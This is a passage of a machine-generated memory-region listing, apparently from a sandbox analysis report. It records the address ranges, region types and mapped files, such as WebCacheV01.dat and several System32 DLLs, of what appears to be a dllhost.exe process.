	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 710
	        start_va = 0x27982f10000
	          end_va = 0x27982f1ffff
	     entry_point = 0x27982f10000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 711
	        start_va = 0x27982f70000
	          end_va = 0x27982f7ffff
	     entry_point = 0x27982f70000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 712
	        start_va = 0x27982f80000
	          end_va = 0x27982f8ffff
	     entry_point = 0x27982f80000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 713
	        start_va = 0x27982f90000
	          end_va = 0x27982f9ffff
	     entry_point = 0x27982f90000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 714
	        start_va = 0x27982fa0000
	          end_va = 0x27982faffff
	     entry_point = 0x27982fa0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 715
	        start_va = 0x27982fb0000
	          end_va = 0x27982fbffff
	     entry_point = 0x27982fb0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 716
	        start_va = 0x27982fc0000
	          end_va = 0x27982fcffff
	     entry_point = 0x27982fc0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 717
	        start_va = 0x27982fd0000
	          end_va = 0x27982fdffff
	     entry_point = 0x27982fd0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 718
	        start_va = 0x27982fe0000
	          end_va = 0x27982fe7fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027982fe0000"
	        filename = ""

Region:
	              id = 719
	        start_va = 0x27982ff0000
	          end_va = 0x27982ffffff
	     entry_point = 0x27982ff0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 720
	        start_va = 0x27983000000
	          end_va = 0x2798300ffff
	     entry_point = 0x27983000000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 721
	        start_va = 0x27983010000
	          end_va = 0x2798301ffff
	     entry_point = 0x27983010000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 722
	        start_va = 0x27983020000
	          end_va = 0x2798302ffff
	     entry_point = 0x27983020000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 723
	        start_va = 0x27983030000
	          end_va = 0x2798303ffff
	     entry_point = 0x27983030000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 724
	        start_va = 0x27983040000
	          end_va = 0x27983047fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027983040000"
	        filename = ""

Region:
	              id = 725
	        start_va = 0x27983050000
	          end_va = 0x2798305ffff
	     entry_point = 0x27983050000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 726
	        start_va = 0x27983060000
	          end_va = 0x2798306ffff
	     entry_point = 0x27983060000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 727
	        start_va = 0x27983070000
	          end_va = 0x2798307ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027983070000"
	        filename = ""

Region:
	              id = 728
	        start_va = 0x27983080000
	          end_va = 0x2798308ffff
	     entry_point = 0x27983080000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 729
	        start_va = 0x27983090000
	          end_va = 0x2798309ffff
	     entry_point = 0x27983090000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 730
	        start_va = 0x279830a0000
	          end_va = 0x279830affff
	     entry_point = 0x279830a0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 731
	        start_va = 0x279830b0000
	          end_va = 0x279830bffff
	     entry_point = 0x279830b0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 732
	        start_va = 0x279830c0000
	          end_va = 0x279830cffff
	     entry_point = 0x279830c0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 733
	        start_va = 0x279830d0000
	          end_va = 0x279830dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279830d0000"
	        filename = ""

Region:
	              id = 734
	        start_va = 0x279830e0000
	          end_va = 0x279830effff
	     entry_point = 0x279830e0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 735
	        start_va = 0x279830f0000
	          end_va = 0x279830fffff
	     entry_point = 0x279830f0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 736
	        start_va = 0x27983100000
	          end_va = 0x2798310ffff
	     entry_point = 0x27983100000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 737
	        start_va = 0x27983110000
	          end_va = 0x2798311ffff
	     entry_point = 0x27983110000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 738
	        start_va = 0x27983120000
	          end_va = 0x2798312ffff
	     entry_point = 0x27983120000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 739
	        start_va = 0x27983130000
	          end_va = 0x2798313ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027983130000"
	        filename = ""

Region:
	              id = 740
	        start_va = 0x27983140000
	          end_va = 0x2798314ffff
	     entry_point = 0x27983140000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 741
	        start_va = 0x27983150000
	          end_va = 0x2798315ffff
	     entry_point = 0x27983150000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 742
	        start_va = 0x27983160000
	          end_va = 0x2798316ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027983160000"
	        filename = ""

Region:
	              id = 743
	        start_va = 0x27983170000
	          end_va = 0x2798317ffff
	     entry_point = 0x27983170000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 744
	        start_va = 0x27983180000
	          end_va = 0x2798318ffff
	     entry_point = 0x27983180000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 745
	        start_va = 0x27983190000
	          end_va = 0x2798319ffff
	     entry_point = 0x27983190000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 746
	        start_va = 0x279831a0000
	          end_va = 0x279831affff
	     entry_point = 0x279831a0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 747
	        start_va = 0x279831b0000
	          end_va = 0x279831bffff
	     entry_point = 0x279831b0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 748
	        start_va = 0x279831c0000
	          end_va = 0x279831cffff
	     entry_point = 0x279831c0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 749
	        start_va = 0x279831d0000
	          end_va = 0x279831dffff
	     entry_point = 0x279831d0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 750
	        start_va = 0x279831e0000
	          end_va = 0x279831effff
	     entry_point = 0x279831e0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 751
	        start_va = 0x279831f0000
	          end_va = 0x279831fffff
	     entry_point = 0x279831f0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 752
	        start_va = 0x27983200000
	          end_va = 0x2798320ffff
	     entry_point = 0x27983200000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 753
	        start_va = 0x27983210000
	          end_va = 0x2798321ffff
	     entry_point = 0x27983210000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 754
	        start_va = 0x27983220000
	          end_va = 0x2798322ffff
	     entry_point = 0x27983220000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 755
	        start_va = 0x27983230000
	          end_va = 0x2798323ffff
	     entry_point = 0x27983230000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 756
	        start_va = 0x27983240000
	          end_va = 0x2798324ffff
	     entry_point = 0x27983240000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 757
	        start_va = 0x27983250000
	          end_va = 0x2798325ffff
	     entry_point = 0x27983250000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 758
	        start_va = 0x27983260000
	          end_va = 0x2798326ffff
	     entry_point = 0x27983260000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 759
	        start_va = 0x27983270000
	          end_va = 0x2798327ffff
	     entry_point = 0x27983270000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 760
	        start_va = 0x27983280000
	          end_va = 0x2798328ffff
	     entry_point = 0x27983280000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 761
	        start_va = 0x27983290000
	          end_va = 0x2798329ffff
	     entry_point = 0x27983290000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 762
	        start_va = 0x279832a0000
	          end_va = 0x279832affff
	     entry_point = 0x279832a0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 763
	        start_va = 0x279832b0000
	          end_va = 0x279832bffff
	     entry_point = 0x279832b0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 764
	        start_va = 0x279832c0000
	          end_va = 0x279832cffff
	     entry_point = 0x279832c0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 765
	        start_va = 0x279832d0000
	          end_va = 0x279832dffff
	     entry_point = 0x279832d0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 766
	        start_va = 0x279832e0000
	          end_va = 0x279832effff
	     entry_point = 0x279832e0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 767
	        start_va = 0x279832f0000
	          end_va = 0x279832fffff
	     entry_point = 0x279832f0000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 768
	        start_va = 0x27983300000
	          end_va = 0x2798330ffff
	     entry_point = 0x27983300000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 769
	        start_va = 0x27983310000
	          end_va = 0x2798331ffff
	     entry_point = 0x27983310000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 770
	        start_va = 0x27983320000
	          end_va = 0x2798332ffff
	     entry_point = 0x27983320000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 771
	        start_va = 0x27983330000
	          end_va = 0x2798333ffff
	     entry_point = 0x27983330000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 772
	        start_va = 0x27983340000
	          end_va = 0x2798334ffff
	     entry_point = 0x27983340000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 773
	        start_va = 0x27983360000
	          end_va = 0x27983367fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027983360000"
	        filename = ""

Region:
	              id = 774
	        start_va = 0x27983370000
	          end_va = 0x2798337ffff
	     entry_point = 0x27983370000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 775
	        start_va = 0x279ffbe0000
	          end_va = 0x279ffbeffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279ffbe0000"
	        filename = ""

Region:
	              id = 776
	        start_va = 0x279ffc00000
	          end_va = 0x279ffc14fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279ffc00000"
	        filename = ""

Region:
	              id = 777
	        start_va = 0x279ffc20000
	          end_va = 0x279ffc23fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279ffc20000"
	        filename = ""

Region:
	              id = 778
	        start_va = 0x279ffc30000
	          end_va = 0x279ffc31fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000279ffc30000"
	        filename = ""

Region:
	              id = 779
	        start_va = 0x279ffc40000
	          end_va = 0x279ffcfdfff
	     entry_point = 0x279ffc40000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 780
	        start_va = 0x279ffdb0000
	          end_va = 0x279ffeaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000279ffdb0000"
	        filename = ""

Region:
	              id = 781
	        start_va = 0x7df5ff4e0000
	          end_va = 0x7ff5ff4dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff4e0000"
	        filename = ""

Region:
	              id = 782
	        start_va = 0x7ff6c4a30000
	          end_va = 0x7ff6c4b2ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c4a30000"
	        filename = ""

Region:
	              id = 783
	        start_va = 0x7ff6c4b30000
	          end_va = 0x7ff6c4b52fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c4b30000"
	        filename = ""

Region:
	              id = 784
	        start_va = 0x7ff6c4e30000
	          end_va = 0x7ff6c4e36fff
	     entry_point = 0x7ff6c4e30000
	     region_type = mapped_file
	            name = "dllhost.exe"
	        filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe")

Region:
	              id = 785
	        start_va = 0x7ffc03e10000
	          end_va = 0x7ffc03e24fff
	     entry_point = 0x7ffc03e10000
	     region_type = mapped_file
	            name = "profext.dll"
	        filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll")

Region:
	              id = 786
	        start_va = 0x7ffc05600000
	          end_va = 0x7ffc058f8fff
	     entry_point = 0x7ffc05600000
	     region_type = mapped_file
	            name = "esent.dll"
	        filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")

Region:
	              id = 787
	        start_va = 0x7ffc06f10000
	          end_va = 0x7ffc0719dfff
	     entry_point = 0x7ffc06f10000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")

Region:
	              id = 788
	        start_va = 0x7ffc0bc60000
	          end_va = 0x7ffc0bfe1fff
	     entry_point = 0x7ffc0bc60000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 789
	        start_va = 0x7ffc10810000
	          end_va = 0x7ffc108a5fff
	     entry_point = 0x7ffc10810000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 790
	        start_va = 0x7ffc11140000
	          end_va = 0x7ffc11170fff
	     entry_point = 0x7ffc11140000
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")

Region:
	              id = 791
	        start_va = 0x7ffc113b0000
	          end_va = 0x7ffc113cefff
	     entry_point = 0x7ffc113b0000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")

Region:
	              id = 792
	        start_va = 0x7ffc116f0000
	          end_va = 0x7ffc116fafff
	     entry_point = 0x7ffc116f0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 793
	        start_va = 0x7ffc11c60000
	          end_va = 0x7ffc11caafff
	     entry_point = 0x7ffc11c60000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 794
	        start_va = 0x7ffc11cb0000
	          end_va = 0x7ffc11cc3fff
	     entry_point = 0x7ffc11cb0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 795
	        start_va = 0x7ffc11cd0000
	          end_va = 0x7ffc11cdefff
	     entry_point = 0x7ffc11cd0000
